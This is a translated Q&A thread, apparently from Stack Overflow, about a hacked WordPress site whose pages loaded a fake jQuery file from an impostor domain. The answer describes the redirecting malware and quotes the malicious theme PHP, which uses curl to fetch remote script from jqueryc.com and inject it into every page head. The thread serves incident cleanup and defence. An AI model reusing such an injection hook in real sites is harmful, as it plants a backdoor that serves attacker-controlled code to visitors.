Jquery的"恶意软件脚本"

Lea*_*eah 3 javascript jquery malware

我的网站遭到黑客攻击,我不能为我的生活找到注入的地方.我已采取必要的预防措施,以确保它不会再次发生,我将我的网站从备份恢复到更早的时间,但我想知道在哪里找到它,以防它发生在我托管的另一个网站.

这是恶意脚本:http://www.jquerys.org/ajax/libs/jquery/jquery-1.6.3.min.js

这是网站:(现已删除)

我到处检查过它并没有成功.

任何帮助将不胜感激.

谢谢.

**对于那些投票给我的人,我已经做了大量的研究,试图在过去的4个小时内自己解决这个问题,我的膝盖上有一个11个月大的孩子.我只把这个问题作为最后的手段发布,因为我自己没有成功地做到这一点.由于我过去在这里得到了很多帮助,所以我觉得问这个问题并没有什么坏处.

Tim*_*ora 8

写下所有评论作为答案,因为这里有很好的信息来打击漏洞利用.


问题

在Wordpress驱动的网站的源代码中发现了一个带有URL作为jQuery CDN的脚本.听起来jquerys.com和jqueryc.com都被用作冒名顶替域名.

恶意代码很简单; 它随机重定向到另一个站点并设置cookie以防止立即重定向(每天一次).由于它很少发生,因此在开发网站时可能永远不会看到这一点,或者忽视它.

可能的原因

  • 输入网址时出错
  • 妥协的服务器
  • 恶意主题
  • 恶意插件

解析度

开始于:http://codex.wordpress.org/FAQ_My_site_was_hacked

OP在主题中找到了这段代码:

// !!! Suspect Code - Do not use for any purpose !!!

//Jquery Function 
if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
        if (function_exists('curl_init')){
        $url="jqueryc.com/jquery-1.6.3.min.js";
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo $data;
     }
  }

  add_action('wp_head', 'insert_jquery_theme');
}
Run Code Online (Sandbox Code Playgroud)

查看源代码,实际上有两个对jQuery的引用; 一个合法,一个不合法.删除前面提到的代码片段可以解决问题.

确定恶意代码的来源(例如主题,插件或受损服务器)仍然很重要.如果不检查恶意代码,则不应恢复备份.

相关链接